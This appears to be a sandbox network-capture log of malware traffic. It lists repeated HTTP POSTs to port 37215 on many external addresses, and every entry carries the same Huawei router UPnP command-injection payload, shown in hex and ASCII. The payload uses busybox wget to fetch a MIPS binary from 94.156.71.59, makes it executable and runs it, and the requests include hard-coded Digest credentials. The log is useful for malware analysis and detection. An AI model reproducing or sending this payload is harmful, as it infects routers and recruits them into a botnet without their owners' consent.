                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            131192.168.2.134112041.186.239.15337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.981700897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            132192.168.2.136062041.144.136.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.982567072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            133192.168.2.1344048197.255.246.13637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.983452082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            134192.168.2.1352668156.197.209.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.984292984 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            135192.168.2.1357818156.159.10.14037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.985167027 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            136192.168.2.1353016156.32.124.8537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.986004114 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            137192.168.2.1357044156.218.214.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.986870050 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            138192.168.2.133784241.209.100.18737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.987735987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            139192.168.2.135113041.109.81.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.988624096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            140192.168.2.1358502197.156.129.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.989479065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 